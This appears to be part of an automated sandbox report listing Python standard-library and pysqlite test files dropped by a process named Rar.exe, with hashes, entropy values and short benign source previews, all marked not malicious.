                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4803
                                                                                                                                                                                      Entropy (8bit):4.617724687837092
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:Do1ORCU/pUkE3RVVb6Wcxr9XEeomh6R3cFoFpAmnzm5:Do1O//pe3CNwmUZU4p1na5
                                                                                                                                                                                      MD5:A9C61F849956F87269BA639FA0224747
                                                                                                                                                                                      SHA1:142CAEE6C62304D7AD4D6CE35F66186C6A778ECB
                                                                                                                                                                                      SHA-256:6108E4763A319C81534103F8A834455F573220F409D0EA511D0977F500E8D203
                                                                                                                                                                                      SHA-512:46B87C899F80D6AD4EDF9C8688760D1ABA7806127AE4F9A2CF36A4EBDD278C704C10E9DD6507374BA96F357713FD7EBBA9FCC5BA4C29943A5A348812C25D28C5
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Author: Paul Kippes <kippesp@gmail.com>....import unittest..import sqlite3 as sqlite......class DumpTests(unittest.TestCase):.. def setUp(self):.. self.cx = sqlite.connect(":memory:").. self.cu = self.cx.cursor().... def tearDown(self):.. self.cx.close().... def test_table_dump(self):.. expected_sqls = [.. """CREATE TABLE "index"("index" blob);""".. ,.. """INSERT INTO "index" VALUES(X'01');""".. ,.. """CREATE TABLE "quoted""table"("quoted""field" text);""".. ,.. """INSERT INTO "quoted""table" VALUES('quoted''value');""".. ,.. "CREATE TABLE t1(id integer primary key, s1 text, " \.. "t1_i1 integer not null, i2 integer, unique (s1), " \.. "constraint t1_idx1 unique (i2));".. ,.. "INSERT INTO \"t1\" VALUES(1,'foo',10,20);".. ,.. "
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):12677
                                                                                                                                                                                      Entropy (8bit):4.724023019248057
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:FOeH4dLD4LA9zHLA56ClknbQY4lZ/2XsmfYVebAUlmV5oN04b+nrIFjV5JFxsDKi:FfCjyl265mfE0NlmaN0ZrIT/Vlna5
                                                                                                                                                                                      MD5:C1F9F8A4DC59A1C15A4FE146C452183F
                                                                                                                                                                                      SHA1:9A053FB59D6CD508FB53AFC1085FF0E525F4CF5F
                                                                                                                                                                                      SHA-256:F01879CF1EA68384C47D1CD9C688610AFDAF161DDE628D40ECB633E4521B33B1
                                                                                                                                                                                      SHA-512:CD9D1446A344324F9D33F7BB668DCD38A6A314AD521CA6640C5D7113D3FBBFD9DCC966CEDD5A47E2A9BFCE4234086193DA1FB4AF65B03D58C87936D8D1B27333
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# pysqlite2/test/factory.py: tests for the various factories in pysqlite..#..# Copyright (C) 2005-2007 Gerhard H.ring <gh@ghaering.de>..#..# This file is part of pysqlite...#..# This software is provided 'as-is', without any express or implied..# warranty. In no event will the authors be held liable for any damages..# arising from the use of this software...#..# Permission is granted to anyone to use this software for any purpose,..# including commercial applications, and to alter it and redistribute it..# freely, subject to the following restrictions:..#..# 1. The origin of this software must not be misrepresented; you must not..# claim that you wrote the original software. If you use this software..# in a product, an acknowledgment in the product documentation would be..# appreciated but is not required...# 2. Altered source versions must be plainly marked as such, and must not be..# misrepresented as being the original software...# 3. This notice may not be removed or
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):11217
                                                                                                                                                                                      Entropy (8bit):4.438152767552218
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:kfVKcdEJsBs+wHFSE4vH8ndq8nkD8nGZ8Qmgna5:GHetB
                                                                                                                                                                                      MD5:8326D0B9A8A0752CB58DEFD0E0996FC3
                                                                                                                                                                                      SHA1:AEA926412A3A5E74BB48F3E9FB054796979C8D31
                                                                                                                                                                                      SHA-256:CC5209FC0BA75D0EF84372E3E27C1CF961B2A1F10146DA4C6C8DF62D9A24ADB6
                                                                                                                                                                                      SHA-512:3EE676F7C54902D1A87106CF26E3F30B506183FA8F972B3CB68147DB0D8F4CBF13F742BF88BDA0E9965A13623D38912906499BFB0DA7EAA4B04042F96E979965
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# pysqlite2/test/hooks.py: tests for various SQLite-specific hooks..#..# Copyright (C) 2006-2007 Gerhard H.ring <gh@ghaering.de>..#..# This file is part of pysqlite...#..# This software is provided 'as-is', without any express or implied..# warranty. In no event will the authors be held liable for any damages..# arising from the use of this software...#..# Permission is granted to anyone to use this software for any purpose,..# including commercial applications, and to alter it and redistribute it..# freely, subject to the following restrictions:..#..# 1. The origin of this software must not be misrepresented; you must not..# claim that you wrote the original software. If you use this software..# in a product, an acknowledgment in the product documentation would be..# appreciated but is not required...# 2. Altered source versions must be plainly marked as such, and must not be..# misrepresented as being the original software...# 3. This notice may not be removed or altere
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):17793
                                                                                                                                                                                      Entropy (8bit):4.591250100488077
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:+fT+FjQ5zjLVX6oxvLv7WGKDTgPKxOQaI8i8CgqOqopna5:m+y5zPFlj7ogPKQ87ZOqf
                                                                                                                                                                                      MD5:55B56B3113C910107F2FCF934BB8DA40
                                                                                                                                                                                      SHA1:751A7AC013ADB81690259713933D830A763B1A25
                                                                                                                                                                                      SHA-256:D0A5C63EF19C729C3F272DE70584A3ADCF7F93B2AC41E084D357BEEFFFFC99D5
                                                                                                                                                                                      SHA-512:76437E7DBB1475963EC9892E963462CF534A5ADEC7BE18D37F0AAB67FA86754103CF75A2E7AB19B1B13CF466FF924E4EB4E50DE49E829D2E1D5EC3D981F9122C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# pysqlite2/test/regression.py: pysqlite regression tests..#..# Copyright (C) 2006-2010 Gerhard H.ring <gh@ghaering.de>..#..# This file is part of pysqlite...#..# This software is provided 'as-is', without any express or implied..# warranty. In no event will the authors be held liable for any damages..# arising from the use of this software...#..# Permission is granted to anyone to use this software for any purpose,..# including commercial applications, and to alter it and redistribute it..# freely, subject to the following restrictions:..#..# 1. The origin of this software must not be misrepresented; you must not..# claim that you wrote the original software. If you use this software..# in a product, an acknowledgment in the product documentation would be..# appreciated but is not required...# 2. Altered source versions must be plainly marked as such, and must not be..# misrepresented as being the original software...# 3. This notice may not be removed or altered from an
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7690
                                                                                                                                                                                      Entropy (8bit):4.581086760965344
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:AOeH4dyrNrUDy7KRjXDLHJSHuwMNaEyEfnwr2nzm5:AfjtUDy7K5XfpAMNCSna5
                                                                                                                                                                                      MD5:ADD004A53BBE4E30587DD0ACC3EEEEED
                                                                                                                                                                                      SHA1:1D7C55785C424A5E7C8A1FF4FB67C947DA2207A1
                                                                                                                                                                                      SHA-256:3D27164EEDC497BD57C83FB437418B52C5900F44A7BACB6C7A4676F784B837B3
                                                                                                                                                                                      SHA-512:5E0CFC446B9B6EE34EA0A13E1A9D4D095E12CE72A199208A3818EA6725F0AA381DE6E0F2569B21D57FD74D61E5FF59334E39C2335FB58C2E6A3E54FEAC60D47F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# pysqlite2/test/transactions.py: tests transactions..#..# Copyright (C) 2005-2007 Gerhard H.ring <gh@ghaering.de>..#..# This file is part of pysqlite...#..# This software is provided 'as-is', without any express or implied..# warranty. In no event will the authors be held liable for any damages..# arising from the use of this software...#..# Permission is granted to anyone to use this software for any purpose,..# including commercial applications, and to alter it and redistribute it..# freely, subject to the following restrictions:..#..# 1. The origin of this software must not be misrepresented; you must not..# claim that you wrote the original software. If you use this software..# in a product, an acknowledgment in the product documentation would be..# appreciated but is not required...# 2. Altered source versions must be plainly marked as such, and must not be..# misrepresented as being the original software...# 3. This notice may not be removed or altered from any sou
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):17190
                                                                                                                                                                                      Entropy (8bit):4.616954370576151
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:0fVotMrW5upva7Dxk3EUTpWPlbd4iEWfe5KgvJN5NELFNaLDc9wOna5:wCM4kTWPlbdWWfeckJNILFNax
                                                                                                                                                                                      MD5:61C68E5E631D3AC0C379E6FE4B2953A9
                                                                                                                                                                                      SHA1:6E56366DEF72BDAC281B0A3073D18BB2842B5E02
                                                                                                                                                                                      SHA-256:421C9646BF5011A5B668BFB15D61E018A939322AC00646E188C708CDC1CF26A2
                                                                                                                                                                                      SHA-512:28F88419FB547E479323709C9A91473EAE0E7D2A78B230F1D26930F5C517CD15D7331425F7039460DA6F0DB760780CD8DA1F6F580A5600983A2052B26F646D0D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# pysqlite2/test/types.py: tests for type conversion and detection..#..# Copyright (C) 2005 Gerhard H.ring <gh@ghaering.de>..#..# This file is part of pysqlite...#..# This software is provided 'as-is', without any express or implied..# warranty. In no event will the authors be held liable for any damages..# arising from the use of this software...#..# Permission is granted to anyone to use this software for any purpose,..# including commercial applications, and to alter it and redistribute it..# freely, subject to the following restrictions:..#..# 1. The origin of this software must not be misrepresented; you must not..# claim that you wrote the original software. If you use this software..# in a product, an acknowledgment in the product documentation would be..# appreciated but is not required...# 2. Altered source versions must be plainly marked as such, and must not be..# misrepresented as being the original software...# 3. This notice may not be removed or altered fro
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):20148
                                                                                                                                                                                      Entropy (8bit):4.662994577920809
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:UfJPM2ScTrvxX5wr4+W8Kc2bdgvK9r1rpKW394KDF1P2gna5:I6gY2bdgQr1rHWX
                                                                                                                                                                                      MD5:93807FB7CBDEE9AAC361028C6A4268FD
                                                                                                                                                                                      SHA1:DC414C7963CE880D8A67A986474CE1A544A852AB
                                                                                                                                                                                      SHA-256:DA83E28CAC7914D45708DDE1113CF1CE91E06B8E1107B554CAF92D0D7039C73D
                                                                                                                                                                                      SHA-512:DD83B4E7A58D7D988E1FEB3A908EAC56A213CD2322B5F6954A7A1427E892177FC100A1E302AD2646C8D70B6B4E739536E155FF9270B6E6FEFAB15B5ECFF24ED5
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# pysqlite2/test/userfunctions.py: tests for user-defined functions and..# aggregates...#..# Copyright (C) 2005-2007 Gerhard H.ring <gh@ghaering.de>..#..# This file is part of pysqlite...#..# This software is provided 'as-is', without any express or implied..# warranty. In no event will the authors be held liable for any damages..# arising from the use of this software...#..# Permission is granted to anyone to use this software for any purpose,..# including commercial applications, and to alter it and redistribute it..# freely, subject to the following restrictions:..#..# 1. The origin of this software must not be misrepresented; you must not..# claim that you wrote the original software. If you use this software..# in a product, an acknowledgment in the product documentation would be..# appreciated but is not required...# 2. Altered source versions must be plainly marked as such, and must not be..# misrepresented as being the original sof
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):28781
                                                                                                                                                                                      Entropy (8bit):4.519014462745639
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:5FBn9P6OfkjvX3hh1SNBFwuO6uw0ZxF6H/5nxANHuqn7IVBRg:5FBn9P622aBC6b0ZxFu/5nyNHui0VBRg
                                                                                                                                                                                      MD5:F09EB9E5E797B7B1B4907818FEF9B165
                                                                                                                                                                                      SHA1:8F9E2BC760C7A2245CAE4628CAECDF1ADA35F46D
                                                                                                                                                                                      SHA-256:CDB9BDCAB7A6FA98F45EF47D3745AC86725A89C5BAF80771F0451D90058A21D6
                                                                                                                                                                                      SHA-512:E71FB7B290BB46AEE4237DBF7FF4ADC2F4491B1FC1C48BD414F5CE376D818564FD37B6113997A630393D9342179FCB7CE0462D6AAD5115E944F8C0CCAB1FA503
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#..# Secret Labs' Regular Expression Engine..#..# convert template to internal format..#..# Copyright (c) 1997-2001 by Secret Labs AB. All rights reserved...#..# See the sre.py file for information on usage and redistribution...#...."""Internal support module for sre"""....import _sre..import sre_parse..from sre_constants import *....assert _sre.MAGIC == MAGIC, "SRE module mismatch"...._LITERAL_CODES = {LITERAL, NOT_LITERAL}.._REPEATING_CODES = {REPEAT, MIN_REPEAT, MAX_REPEAT}.._SUCCESS_CODES = {SUCCESS, FAILURE}.._ASSERT_CODES = {ASSERT, ASSERT_NOT}.._UNIT_CODES = _LITERAL_CODES | {ANY, IN}....# Sets of lowercase characters which have the same uppercase..._equivalences = (.. # LATIN SMALL LETTER I, LATIN SMALL LETTER DOTLESS I.. (0x69, 0x131), # i... # LATIN SMALL LETTER S, LATIN SMALL LETTER LONG S.. (0x73, 0x17f), # s... # MICRO SIGN, GREEK SMALL LETTER MU.. (0xb5, 0x3bc), # .... # COMBINING GREEK YPOGEGRAMMENI, GREEK SMALL LETTER IOTA, GREEK PROSGEGRAMMENI
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7438
                                                                                                                                                                                      Entropy (8bit):5.182844332397723
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:5eMD6PqhJ1J1eWWdQbaAtYetYetYAPRtihfylCcfPAEvuzgQ:5eC7eKacRtilCAEK
                                                                                                                                                                                      MD5:BCA79743254AA4BC94DACE167A8B0871
                                                                                                                                                                                      SHA1:D1DA34FBE097F054C773FF8040D2E3852C3D77F1
                                                                                                                                                                                      SHA-256:513373CDE5987D794DC429F7C71A550FE49E274BF82D0856BEC40DCA4079DADC
                                                                                                                                                                                      SHA-512:1C0AB3CE7B24ACD2FFBD39A9D4BF343AA670525465B265A6572BDEC2036B1A72AAAFE07AFE63A21246456427F10BE519AEEE9FC707CBB0151AC1E180239AD2AF
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#..# Secret Labs' Regular Expression Engine..#..# various symbols used by the regular expression engine...# run this script to update the _sre include files!..#..# Copyright (c) 1998-2001 by Secret Labs AB. All rights reserved...#..# See the sre.py file for information on usage and redistribution...#...."""Internal support module for sre"""....# update when constants are added or removed....MAGIC = 20171005....from _sre import MAXREPEAT, MAXGROUPS....# SRE standard exception (access as sre.error)..# should this really be here?....class error(Exception):.. """Exception raised for invalid regular expressions..... Attributes:.... msg: The unformatted error message.. pattern: The regular expression pattern.. pos: The index in the pattern where compilation failed (may be None).. lineno: The line corresponding to pos (may be None).. colno: The column corresponding to pos (may be None).. """.... __module__ = 're'.... def __init__(self, msg, p
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):41855
                                                                                                                                                                                      Entropy (8bit):4.104634138762242
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:21S5/1DRy/C5oZn9F3fckfWoCf2PXACJzXdQ1f3hBX5FEnRxzAgHNM3n7S4:21S5/1DQ/C5oZL3UkfWoCf2eE4
                                                                                                                                                                                      MD5:D1AF43B8E4F286625A0144373CF0DE28
                                                                                                                                                                                      SHA1:7FBD019519C5223D67311E51150595022D95FE86
                                                                                                                                                                                      SHA-256:C029A310E36013ABC15610FF09A1E31D9FB1A0E4C60293150722C08FC9E7B090
                                                                                                                                                                                      SHA-512:75AB3B5A2AAD2AC44AB63028982A94BB718AAF6C67F6B59A8EDC8C2C49287DD16667923E1889C68404053D61DF742864A6E85545BBFB17624A5844BB049767F9
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#..# Secret Labs' Regular Expression Engine..#..# convert re-style regular expression to sre pattern..#..# Copyright (c) 1998-2001 by Secret Labs AB. All rights reserved...#..# See the sre.py file for information on usage and redistribution...#...."""Internal support module for sre"""....# XXX: show string offset and offending character for all errors....from sre_constants import *....SPECIAL_CHARS = ".\\[{()*+?^$|"..REPEAT_CHARS = "*+?{"....DIGITS = frozenset("0123456789")....OCTDIGITS = frozenset("01234567")..HEXDIGITS = frozenset("0123456789abcdefABCDEF")..ASCIILETTERS = frozenset("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ")....WHITESPACE = frozenset(" \t\n\r\v\f")...._REPEATCODES = frozenset({MIN_REPEAT, MAX_REPEAT}).._UNITCODES = frozenset({ANY, RANGE, IN, LITERAL, NOT_LITERAL, CATEGORY})....ESCAPES = {.. r"\a": (LITERAL, ord("\a")),.. r"\b": (LITERAL, ord("\b")),.. r"\f": (LITERAL, ord("\f")),.. r"\n": (LITERAL, ord("\n")),.. r"\r": (LITERAL, ord("\r"))
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):53651
                                                                                                                                                                                      Entropy (8bit):4.77575452147837
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:tMVe9UvCPKK444abg7+0MkQMj1MnCXA+Y629sc7F4l0:WVuHPKKYabOM2MnCw+YFJ7F4a
                                                                                                                                                                                      MD5:571E6D3BD2027FAD1078DEE641CC5943
                                                                                                                                                                                      SHA1:599F7505020E6F09E39067C5DD7D4A90D4FCD446
                                                                                                                                                                                      SHA-256:A2558EFEF465228296EE4507D49605BE195FEB557CD30BAC2ED551B59E701EA7
                                                                                                                                                                                      SHA-512:D27F64F43E8414648A984CC5BB6E59FAC93C8E1F3E3BF06CA3B8418FAC1BA44479B1509262AA712C180D590027EC318FEE8E05D5F503F30DE8BA0A0841DC8942
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Wrapper module for _ssl, providing some additional facilities..# implemented in Python. Written by Bill Janssen....."""This module provides some more Pythonic support for SSL.....Object types:.... SSLSocket -- subtype of socket.socket which does SSL over the socket....Exceptions:.... SSLError -- exception raised for I/O errors....Functions:.... cert_time_to_seconds -- convert time string used for certificate.. notBefore and notAfter functions to integer.. seconds past the Epoch (the time values.. returned from time.time()).... get_server_certificate (addr, ssl_version, ca_certs, timeout) -- Retrieve the.. certificate from the server at the specified.. address and return it as a PEM-encoded string......Integer constants:....SSL_ERROR_ZERO_RETURN..SSL_ERROR_WANT_READ..SSL_ERROR_WANT_WRITE..SSL_ERROR_WANT_X509_LOOKUP..SSL_ERROR_SYSCALL..SSL_ERROR_SSL..SSL_ERR
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5680
                                                                                                                                                                                      Entropy (8bit):5.1523236470837945
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:btQUzIkdY5TVIU5zY553qt50eS52AY5LAx5UztU5ws45lz45R7J8nkwg3GCgt8Tn:ZB7dkV3YHqoeFAQAczDsQzmt8oW8TDHj
                                                                                                                                                                                      MD5:7A7143CBE739708CE5868F02CD7DE262
                                                                                                                                                                                      SHA1:E915795B49B849E748CDBD8667C9C89FCDFF7BAF
                                                                                                                                                                                      SHA-256:E514FD41E2933DD1F06BE315FB42A62E67B33D04571435A4815A18F490E0F6CE
                                                                                                                                                                                      SHA-512:7ECF6AC740B734D26D256FDE2608375143C65608934AA51DF7AF34A1EE22603A790ADC5B3D67D6944BA40F6F41064FA4D6957E000DE441D99203755820E34D53
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Constants/functions for interpreting results of os.stat() and os.lstat().....Suggested usage: from stat import *.."""....# Indices for stat struct members in the tuple returned by os.stat()....ST_MODE = 0..ST_INO = 1..ST_DEV = 2..ST_NLINK = 3..ST_UID = 4..ST_GID = 5..ST_SIZE = 6..ST_ATIME = 7..ST_MTIME = 8..ST_CTIME = 9....# Extract bits from the mode....def S_IMODE(mode):.. """Return the portion of the file's mode that can be set by.. os.chmod()... """.. return mode & 0o7777....def S_IFMT(mode):.. """Return the portion of the file's mode that describes the.. file type... """.. return mode & 0o170000....# Constants used as S_IFMT() for various file types..# (not all are implemented on all systems)....S_IFDIR = 0o040000 # directory..S_IFCHR = 0o020000 # character device..S_IFBLK = 0o060000 # block device..S_IFREG = 0o100000 # regular file..S_IFIFO = 0o010000 # fifo (named pipe)..S_IFLNK = 0o120000 # symbolic link..S_IFSOCK = 0o140000 # s
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):44478
                                                                                                                                                                                      Entropy (8bit):4.826888827291007
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:ezttzGzMBgrEiMuqIkrWIq/0MIR9z5zjw1mTH0+8H0xAEVPCy:extqAYFHl/fu9lgmTU1HeAU
                                                                                                                                                                                      MD5:4969BE7A4BD3A7D14413A54CCFC36806
                                                                                                                                                                                      SHA1:696C43BD013708A58C401CC25BE4F2565C910E97
                                                                                                                                                                                      SHA-256:AAF6547A24B49197A95977E128EE4EC8F8E8F03498059FB4AE826A036C9B0C7A
                                                                                                                                                                                      SHA-512:1E5ED30CC795A331F25390D03019374D9BC9650F1F8339507260771E204884651F2982597EC88CC2F0A1F33AF649AE44B6720E4953FA0D2F33E288883F5376BF
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""..Basic statistics module.....This module provides functions for calculating statistics of data, including..averages, variance, and standard deviation.....Calculating averages..--------------------....================== ==================================================..Function Description..================== ==================================================..mean Arithmetic mean (average) of data...fmean Fast, floating point arithmetic mean...geometric_mean Geometric mean of data...harmonic_mean Harmonic mean of data...median Median (middle value) of data...median_low Low median of data...median_high High median of data...median_grouped Median, or 50th percentile, of grouped data...mode Mode (most common value) of data...multimode List of modes (most common values of data)...quantiles Divide data into intervals with equal probability...================== ==
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):10846
                                                                                                                                                                                      Entropy (8bit):4.509064552074567
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:NeRTSYTE9F7CE3WCLi9S/j/8RNnGPu+2MZKqhMohlPbokGJ2A7u6VOC:NeRTSYTE9oNCLeS/j/8TG2+2MZKqhMoC
                                                                                                                                                                                      MD5:CB7C76D92FE77FCEB57279A18AFDB96E
                                                                                                                                                                                      SHA1:BC102311785E8912AFDE553CAD6C54A92EA68051
                                                                                                                                                                                      SHA-256:34B846AE1458673B9A9026E6300FF0947DD1B3DC374BDD1D126518D8D1A528B2
                                                                                                                                                                                      SHA-512:7785AFAEA59CC3F86F590923C1416832C8AADCCB67A589074B8811BA1260257ABF3E8D5BF386F9296E4C31D8E69C2886D411D313EB2E4BCDCDE794C83A4C3480
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""A collection of string constants.....Public module variables:....whitespace -- a string containing all ASCII whitespace..ascii_lowercase -- a string containing all ASCII lowercase letters..ascii_uppercase -- a string containing all ASCII uppercase letters..ascii_letters -- a string containing all ASCII letters..digits -- a string containing all ASCII decimal digits..hexdigits -- a string containing all ASCII hexadecimal digits..octdigits -- a string containing all ASCII octal digits..punctuation -- a string containing all ASCII punctuation characters..printable -- a string containing all ASCII characters considered printable...."""....__all__ = ["ascii_letters", "ascii_lowercase", "ascii_uppercase", "capwords",.. "digits", "hexdigits", "octdigits", "printable", "punctuation",.. "whitespace", "Formatter", "Template"]....import _string....# Some strings for ctype-style character classification..whitespace = ' \t\n\r\v\f'..ascii_lowercase = 'abcdefghijklmnopqrstuvwx
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):13189
                                                                                                                                                                                      Entropy (8bit):4.91396520579551
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:uqbH8M915eiV4fTpjgLPXEj7w6NraVKt+oKVcXRn:uwnMaLPIN+VKtWKn
                                                                                                                                                                                      MD5:7A4A0BE66939C3F2E62531A37F6B60E1
                                                                                                                                                                                      SHA1:A4E0BE0F314B738F9ACE2698BF5B7910A9B4A1A5
                                                                                                                                                                                      SHA-256:FE08A5C09B78E5037F7CCB95B9014C5F4CC2B3968C9001F321D4788E0ADB45EB
                                                                                                                                                                                      SHA-512:DF83633E7F827D909426B58AADD9AD5664BAB4787119F005C25A7659E28BC8D2834CAD7B3CF0BE011D3AD6F30129FF724D5C40601ED50B9F4C94B2635875B226
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# This file is generated by mkstringprep.py. DO NOT EDIT..."""Library that exposes various tables found in the StringPrep RFC 3454.....There are two kinds of tables: sets, for which a member test is provided,..and mappings, for which a mapping function is provided..."""....from unicodedata import ucd_3_2_0 as unicodedata....assert unicodedata.unidata_version == '3.2.0'....def in_table_a1(code):.. if unicodedata.category(code) != 'Cn': return False.. c = ord(code).. if 0xFDD0 <= c < 0xFDF0: return False.. return (c & 0xFFFF) not in (0xFFFE, 0xFFFF)......b1_set = set([173, 847, 6150, 6155, 6156, 6157, 8203, 8204, 8205, 8288, 65279] + list(range(65024,65040)))..def in_table_b1(code):.. return ord(code) in b1_set......b3_exceptions = {..0xb5:'\u03bc', 0xdf:'ss', 0x130:'i\u0307', 0x149:'\u02bcn',..0x17f:'s', 0x1f0:'j\u030c', 0x345:'\u03b9', 0x37a:' \u03b9',..0x390:'\u03b9\u0308\u0301', 0x3b0:'\u03c5\u0308\u0301', 0x3c2:'\u03c3', 0x3d0:'\u03b2',..0x3d1:'\u03b8', 0x3d2:'\u03c5'
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):272
                                                                                                                                                                                      Entropy (8bit):4.3743352648582725
                                                                                                                                                                                      Encrypted:false
